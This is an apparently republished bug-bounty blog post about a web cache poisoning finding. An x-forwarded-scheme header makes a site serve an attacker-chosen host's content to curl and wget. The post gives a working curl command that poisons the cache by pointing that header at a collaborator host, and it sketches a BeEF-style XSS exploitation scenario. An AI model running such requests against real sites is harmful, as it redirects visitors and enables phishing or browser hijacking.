Cache poisoning of wget

4 years ago 181
BOOK THIS SPACE FOR AD
ARTICLE AD

Vuk Ivanovic

Image for post

Image for post

(edited to hide the affected company) a real world example of the cache poison detection

Another interesting case of cache poisoning (you can read about the first one here). This one, however, isn’t as “sexy” as the previous one. You have been warned.

There are times when burp and web browser (be it firefox or chrome) don’t quite agree on how to present the response to the issued request (especially if the request has xss payload). This is one of those stories.

My default approach to bug hunting is to browse the target website with burp as a proxy. And, if the waf is so kind I can have Param Miner enabled without getting blocked, and with the box attempt cache poison checked.

Image for post

Image for post

And, if the web server is not configured correctly, or to be honest, if the stars are aligned, the result is a useful cache poison, as the link from earlier. But, this is not that story. Not to say that the case in this story is not useful, it’s just harder to sell it.

Enough chit-chat/exposition, let’s dig into it:

After browsing the target website and doing all sorts of tests, getting nothing, I figured time to review. I checked the burp pro dashboard, and as a nice boost I noticed that Param Miner had found something. But, from past experiences, I already knew that it was too early to get excited.

Upon reviewing the finding, and doing some additional tests to ensure it wasn’t the dreaded false positive, I found myself with cache poison that was an open redirect, but better. Visiting website.com would redirect the visitor/victim to whatever I have specified in the hidden header. Initial impact: a version of DoS, but instead of denying the service by crashing the server, it would deny the service by redirecting people to another website. Additional impact could be phishing depending on various factors. But, alas, I soon learned an ugly truth.

Burp Repeater v Web browser:

I love using burp repeater over any web browser when it comes to bug hunting. I can immediately see the source code of the page, the response time (useful when testing for time based sqli/rce), headers (useful when testing for cors, csrf), and there’s a nice feature for the search box on the response (Auto-scroll to match when text changes, useful for xss testing among other things).

But, while the response can show even within html code that your xss payload wasn’t encoded, and even Show response in browser may result in the xss firing, it could be false positive. The only way to be sure is to attempt that url with that xss payload directly inside firefox, chrome, etc. And if it still fires in one or more of those browsers, you’re good. Time to write a report. Otherwise, it gets complicated.

PoC with limitations:

The hidden header in question — x-forwarded-scheme

The attack with curl as a way to poison the cache (has to be repeated multiple times, or can be wrapped in a loop):

curl — header “x-forwarded-scheme: https://burpcollab.net" https://website.com/

Results:

curl https://website.com shows content of https://burpcollab.net

wget https://website.com saves a file with the content of https://burpcollab.net

What’s missing as a PoC result? Did you spot it yet? The same thing, but with a browser. Clearly, it’s not only because it would require some masterful editing with gif or a youtube clip, but because it doesn’t work with browsers. I tried all browsers and always got the same boring response.

And some more limitations:

Aside from it only working with curl and wget, didn’t bother trying telnet and similar, there’s another limitation. X-forwarded-scheme is actually http or https. Similar to x-forwarded-proto. Meaning, instead of having https://website.com , with the value being https://burpcollab.net, the result is a redirect to https://burpcollab.net://website.com (instead of https://website.com or http://website.com) and burpcollaborator is configured to ignore all sorts of malformed requests. Therefore the ://website.com part is ignored. The solution would be payload that ends with # or %23 depending on how its interpreted on the other end.

Bonus: yet another limitation is that the attacker’s website has to be ssl/https, it doesn’t work with http for whatever reason.

How to exploit it?

It’s not easy. The attacker would have to somehow trick the victim to use wget to access the website in question, and then to open the downloaded html file without verifying its content, while in fact, that html file would contain xss payloads as per BeEF or similar, and that way the attacker could gain some control over the victim’s browser. But that’s so far fetched. And yet, I have tried selling it as such. I remember, as I was writing the painful reproduction steps and the scenario straight out of a Hollywood movie (jk, but you get the point) I was pretty sure that I was simply doing some writing/typing exercises. I did get some nice kudos points, though :)

Read Entire Article